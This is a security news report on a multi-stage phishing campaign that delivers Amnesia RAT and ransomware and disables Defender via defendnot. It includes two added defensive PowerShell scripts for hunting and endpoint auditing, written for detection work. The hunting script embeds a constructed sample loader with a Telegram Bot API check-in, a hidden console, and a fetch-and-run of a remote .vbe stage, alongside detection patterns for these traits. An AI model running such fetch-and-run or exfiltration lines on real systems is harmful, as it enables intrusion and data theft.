March 15, 2026

A new multi-stage phishing campaign has been observed targeting users in Russia with ransomware and a remote access trojan called Amnesia RAT.

“The attack begins with social engineering lures delivered through business-themed documents crafted to appear routine and benign,” Fortinet FortiGuard Labs researcher Cara Lin said in a technical breakdown published this week. “These documents and accompanying scripts function as visual distractions, diverting victims to fake tasks or status messages while malicious activity runs silently in the background.”

The campaign stands out for a couple of reasons. First, it uses multiple public cloud services to distribute different kinds of payloads. While GitHub is mainly used to distribute scripts, binary payloads are staged on Dropbox. This separation complicates takedown efforts, since removing either host on its own does not break the chain, which makes the infrastructure more resilient.

Another “defining characteristic” of the campaign, per Fortinet, is the operational abuse of defendnot to disable Microsoft Defender. Defendnot was released last year by a security researcher who goes by the online alias es3n1n as a way to trick the security program into believing another antivirus product has already been installed on the Windows host. It does so through the Windows Security Center (WSC) API: it registers a bogus antivirus product, and Defender disables its own protection to avoid running alongside what it believes is a third-party product.

The campaign leverages social engineering to distribute compressed archives, which contain multiple decoy documents and a malicious Windows shortcut (LNK) with Russian-language filenames. The LNK file uses a double extension (“Задание_для_бухгалтера_02отдела.txt.lnk”) to give the impression that it is a text file. Explorer never displays the .lnk extension, even when “Hide extensions for known file types” is turned off, so the shortcut appears to the user as a plain .txt document.

When executed, it runs a PowerShell command to retrieve the next-stage PowerShell script hosted on a GitHub repository (“github[.]com/Mafin111/MafinREP111”), which then serves as a first-stage loader to establish a foothold, prepare the system to hide evidence of malicious activity, and hand off control flow to subsequent stages.

“The script first suppresses visible execution by programmatically hiding the PowerShell console window,” Fortinet said. “This removes any immediate visual indicators that a script is running. It then generates a decoy text document in the user’s local application data directory. Once written to disk, the decoy document is automatically opened.”

Once the document is displayed to the victim to keep up the ruse, the script sends a message to the attacker using the Telegram Bot API, informing the operator that the first stage has been successfully executed. After a deliberately introduced 444-second delay, the PowerShell script runs a Visual Basic Script (“SCRRC4ryuk.vbe”) hosted in the same repository location.

This provides two main advantages: it keeps the loader lightweight, and it allows the threat actors to update or replace the payload’s functionality on the fly without having to introduce any changes to the attack chain itself.
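A hunting script for the first-stage loader traits described above (hidden console window, decoy written to the local application data folder, Telegram Bot API check-in, long sleep, remote VBE stage), as an added example that is not part of the Fortinet report or the attacker's code. It scores PowerShell Script Block Logging events (Event ID 4104) against a list of indicators. The indicator patterns, the threshold of three indicators and the 300-second sleep cut-off are this example's assumptions, and the embedded sample script block is constructed for the demonstration, not a captured artifact from the campaign.

```powershell
# Added example, not from the Fortinet report or the campaign's tooling.
# Scores PowerShell script blocks against the loader traits the report describes.
# Indicator patterns, $MinIndicators and $MinSleepSeconds are assumptions.

$MinIndicators   = 3     # assumption: flag a block matching at least this many traits
$MinSleepSeconds = 300   # assumption: treat a sleep this long as a detonation delay

$LoaderIndicators = @(
    @{ Name = 'ConsoleHidden';       Pattern = 'GetConsoleWindow|ShowWindow(?:Async)?|-WindowStyle\s+Hidden' }
    @{ Name = 'TelegramBotApi';      Pattern = 'api\.telegram\.org/bot' }
    @{ Name = 'GitHubFetch';         Pattern = 'raw\.githubusercontent\.com|github\.com/[^\s''"]+/raw/' }
    @{ Name = 'LongSleep';           Pattern = 'Start-Sleep\s+(?:-s(?:econds)?\s+)?(?<secs>\d+)' }
    @{ Name = 'DecoyInLocalAppData'; Pattern = '\$env:LOCALAPPDATA[^\r\n]*\.txt' }
    @{ Name = 'ScriptHostStage';     Pattern = '\.vbe\b|\.vbs\b|\b[wc]script(?:\.exe)?\b' }
)

function Get-LoaderIndicators {
    # Returns the names of every indicator that matches the script text.
    param([Parameter(Mandatory)][string]$ScriptText)
    foreach ($i in $LoaderIndicators) {
        if ($ScriptText -match $i.Pattern) {
            # Short sleeps are routine; only a long delay counts as an indicator.
            if ($i.Name -eq 'LongSleep' -and [int]$Matches['secs'] -lt $MinSleepSeconds) { continue }
            $i.Name
        }
    }
}

function Test-ScriptBlock {
    param([Parameter(Mandatory)][string]$ScriptText, [string]$Source = 'inline')
    $hits = @(Get-LoaderIndicators -ScriptText $ScriptText)
    [pscustomobject]@{
        Source     = $Source
        Score      = $hits.Count
        Indicators = ($hits -join ', ')
        Suspicious = ($hits.Count -ge $MinIndicators)
    }
}

function Find-SuspiciousScriptBlocks {
    # Live mode: requires Script Block Logging. ScriptBlockText is the third
    # property of a 4104 event; very long blocks are split over several events.
    Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -FilterXPath '*[System[EventID=4104]]' -ErrorAction Stop |
        ForEach-Object { Test-ScriptBlock -ScriptText $_.Properties[2].Value -Source "RecordId=$($_.RecordId)" } |
        Where-Object Suspicious
}

# Constructed sample that mimics the described stage-one behaviour (not the real loader).
$sample = @'
Add-Type -Namespace Win -Name Con -MemberDefinition '
  [DllImport("kernel32.dll")] public static extern IntPtr GetConsoleWindow();
  [DllImport("user32.dll")]   public static extern bool ShowWindow(IntPtr h, int c);'
[Win.Con]::ShowWindow([Win.Con]::GetConsoleWindow(), 0)
$decoy = Join-Path $env:LOCALAPPDATA 'task.txt'; Set-Content $decoy 'see attachment'; Start-Process $decoy
Invoke-RestMethod "https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=stage1+ok"
Start-Sleep -Seconds 444
$vbe = Join-Path $env:TEMP 'stage2.vbe'
Invoke-WebRequest 'https://raw.githubusercontent.com/<user>/<repo>/main/stage2.vbe' -OutFile $vbe
wscript.exe $vbe
'@

Test-ScriptBlock -ScriptText $sample -Source 'constructed-sample' | Format-List
```

The offline run scores the constructed sample on all six indicators. For a live sweep, call Find-SuspiciousScriptBlocks on a host with Script Block Logging enabled; because 4104 splits large blocks across several events, a loader that only trips one or two indicators per fragment can fall under the threshold, so correlate on ScriptBlockId if the score looks low.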

The Visual Basic Script is heavily obfuscated and acts as the controller that assembles the next-stage payload directly in memory, thereby avoiding leaving any artifacts on disk. The final-stage script checks whether it is running with elevated privileges and, if not, repeatedly displays a User Account Control (UAC) prompt to force the victim to grant it the necessary permissions. The script pauses for 3,000 milliseconds between attempts.

In the next phase, the malware initiates a series of actions to suppress visibility, neutralize endpoint security mechanisms, conduct reconnaissance, inhibit recovery, and ultimately deploy the main payloads:

  • Configure Microsoft Defender exclusions to prevent the program from scanning ProgramData, Program Files, Desktop, Downloads, and the system temporary directory
  • Use PowerShell to turn off additional Defender protection components
  • Deploy defendnot to register a fake antivirus product with the Windows Security Center interface and cause Microsoft Defender to disable itself to avoid potential conflicts
  • Conduct environment reconnaissance and surveillance via screenshot capture through a dedicated .NET module downloaded from the GitHub repository that takes a screengrab every 30 seconds, saves it as a PNG image, and exfiltrates the data using a Telegram bot
  • Disable Windows administrative and diagnostic tools by tampering with Registry-based policy controls
  • Implement a file association hijacking mechanism such that opening files with certain predefined extensions causes a message to be displayed to the victim, instructing them to contact the threat actor via Telegram

One of the final payloads deployed after successfully disarming security controls and recovery mechanisms is Amnesia RAT (“svchost.scr”, a screensaver extension that Windows treats as an ordinary executable, under a name chosen to resemble the legitimate svchost.exe), which is retrieved from Dropbox and is capable of broad data theft and remote control. It is designed to pilfer information stored in web browsers, cryptocurrency wallets, Discord, Steam, and Telegram, along with system metadata, screenshots, webcam images, microphone audio, clipboard contents, and the active window title.

“The RAT enables full remote interaction, including process enumeration and termination, shell command execution, arbitrary payload deployment, and execution of additional malware,” Fortinet said. “Exfiltration is primarily carried out over HTTPS using Telegram Bot APIs. Larger datasets may be uploaded to third-party file-hosting services such as GoFile, with download links relayed to the attacker via Telegram.”

In all, Amnesia RAT facilitates credential theft, session hijacking, financial fraud, and real-time data gathering, making it a comprehensive tool for account takeover and follow-on attacks.

The second payload delivered by the script is ransomware derived from the Hakuna Matata ransomware family. It is configured to encrypt documents, archives, images, media, source code, and application assets on the infected endpoint, but not before terminating any process that could interfere with its operation.

In addition, the ransomware monitors clipboard contents and silently replaces cryptocurrency wallet addresses with attacker-controlled wallets to reroute transactions. The infection sequence ends with the script deploying WinLocker to restrict user interaction.

“This attack chain demonstrates how modern malware campaigns can achieve full system compromise without exploiting software vulnerabilities,” Lin concluded. “By systematically abusing native Windows features, administrative tools, and policy enforcement mechanisms, the attacker disables endpoint defenses before deploying persistent surveillance tooling and destructive payloads.”

To counter defendnot’s abuse of the Windows Security Center API, Microsoft recommends that users enable Tamper Protection to prevent unauthorized changes to Defender settings and monitor for suspicious API calls or Defender service modifications. With Tamper Protection on, local attempts to turn off real-time protection and related components, whether through registry edits or PowerShell cmdlets such as Set-MpPreference, are ignored rather than applied.
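An endpoint audit covering both the defence-disabling steps listed earlier (broad Defender exclusions, disabled protection components, a bogus antivirus product registered in Security Center, policy keys that disable administrative tools, hijacked file associations) and the Tamper Protection check Microsoft recommends. This is an added example, not code from Fortinet, Microsoft or the defendnot project. Run it elevated on a Windows client SKU (the root/SecurityCenter2 namespace does not exist on Windows Server). The expected antivirus names, the policy value names, the watched extensions and the script-host pattern are this example's assumptions and should be adjusted to the estate being checked.

```powershell
# Added example, not from the Fortinet report, Microsoft or defendnot.
# Audits an endpoint for the defence-disabling steps the article describes.
# The four lists below are assumptions: a starting point, not a definitive set.

$ExpectedAvNames   = 'Windows Defender', 'Microsoft Defender Antivirus'        # assumption
$WatchedExtensions = '.txt', '.docx', '.xlsx', '.pdf', '.jpg'                   # assumption
$ScriptHostPattern = 'wscript|cscript|powershell|pwsh|mshta|rundll32|cmd\.exe'  # assumption
$PolicyChecks = @(                                                              # assumption
    @{ Key = 'Software\Microsoft\Windows\CurrentVersion\Policies\System';   Values = 'DisableTaskMgr', 'DisableRegistryTools' }
    @{ Key = 'Software\Policies\Microsoft\Windows\System';                  Values = 'DisableCMD' }
    @{ Key = 'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'; Values = 'NoRun', 'NoControlPanel' }
)

function Get-DefenderFindings {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    if (-not $status.IsTamperProtected)  { 'Tamper Protection is off' }
    if ($pref.DisableRealtimeMonitoring) { 'Real-time monitoring disabled' }
    if ($pref.DisableBehaviorMonitoring) { 'Behavior monitoring disabled' }
    if ($pref.DisableIOAVProtection)     { 'Download/attachment (IOAV) scanning disabled' }
    if ($pref.DisableScriptScanning)     { 'Script scanning disabled' }
    # Exclusions covering whole user or system roots are the campaign's pattern.
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and $p -match 'ProgramData|Program Files|\\Desktop|\\Downloads|\\Temp') { "Broad Defender exclusion: $p" }
    }
}

function Get-SecurityCenterFindings {
    # defendnot registers a fake product in this namespace so that Defender stands down.
    Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | ForEach-Object {
        $name = $_.displayName
        $exe  = [string]$_.pathToSignedProductExe
        if ($name -in $ExpectedAvNames) { return }
        $reason = if (-not $exe -or $exe -match '^[a-z]+://') { 'no file-backed executable' }
                  elseif (-not (Test-Path -LiteralPath $exe)) { 'executable missing from disk' }
                  elseif ((Get-AuthenticodeSignature -FilePath $exe).Status -ne 'Valid') { 'executable not validly signed' }
                  else { 'product not in the expected list' }
        "Unexpected antivirus registration '$name' ($exe): $reason"
    }
}

function Get-PolicyFindings {
    foreach ($hive in 'HKCU:', 'HKLM:') {
        foreach ($c in $PolicyChecks) {
            $path = Join-Path $hive $c.Key
            if (-not (Test-Path $path)) { continue }
            $props = Get-ItemProperty -Path $path
            foreach ($v in $c.Values) {
                if ($props.$v -eq 1) { "Tool-disabling policy ${v}=1 under $path" }
            }
        }
    }
}

function Get-FileAssociationFindings {
    # HKCR is the merged view, so per-user hijacks placed in HKCU\Software\Classes show up here.
    foreach ($ext in $WatchedExtensions) {
        $extKey = "Registry::HKEY_CLASSES_ROOT\$ext"
        if (-not (Test-Path -LiteralPath $extKey)) { continue }
        $progId = (Get-ItemProperty -LiteralPath $extKey).'(default)'
        if (-not $progId) { continue }
        $cmdKey = "Registry::HKEY_CLASSES_ROOT\$progId\shell\open\command"
        if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
        $cmd = (Get-ItemProperty -LiteralPath $cmdKey).'(default)'
        if ($cmd -match $ScriptHostPattern) { "Handler for $ext ($progId) runs a script host: $cmd" }
    }
}

$findings = @(Get-DefenderFindings) + @(Get-SecurityCenterFindings) + @(Get-PolicyFindings) + @(Get-FileAssociationFindings)
if ($findings.Count) { $findings | ForEach-Object { Write-Warning $_ } } else { 'No findings.' }
```

The file association check follows only the ProgID route (extension key, then the ProgID's shell\open\command); a hijack that puts a shell\open\command subkey directly under the extension key, or that goes through a UserChoice entry, needs an additional lookup. The Security Center check treats any product outside the expected list as a finding; a legitimate third-party AV should be added to that list rather than silenced by editing the function.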

The development comes as human resources, payroll, and internal administrative departments belonging to Russian corporate entities have been targeted by a threat actor tracked as UNG0902 to deliver a previously unknown implant dubbed DUPERUNNER that is responsible for loading AdaptixC2, a command-and-control (C2) framework. The spear-phishing campaign, codenamed Operation DupeHike, has been ongoing since November 2025.

Seqrite Labs said the attacks involve the use of decoy documents centered on themes related to employee bonuses and internal financial policies to convince recipients to open a malicious LNK file inside ZIP archives, which leads to the execution of DUPERUNNER.

The implant reaches out to an external server to fetch and display a decoy PDF document, while system profiling and the download of the AdaptixC2 beacon are carried out in the background.

In recent months, Russian organizations have also apparently been targeted by another threat actor tracked as Paper Werewolf (aka GOFFEE), which has employed artificial intelligence (AI)-generated decoys and DLL files compiled as Excel XLL add-ins to deliver a backdoor called EchoGather.

“Once launched, the backdoor collects system information, communicates with a hardcoded command-and-control (C2) server, and supports command execution and file transfer operations,” Intezer security researcher Nicole Fishbein said. It “communicates with the C2 over HTTP(S) using the WinHTTP API.”
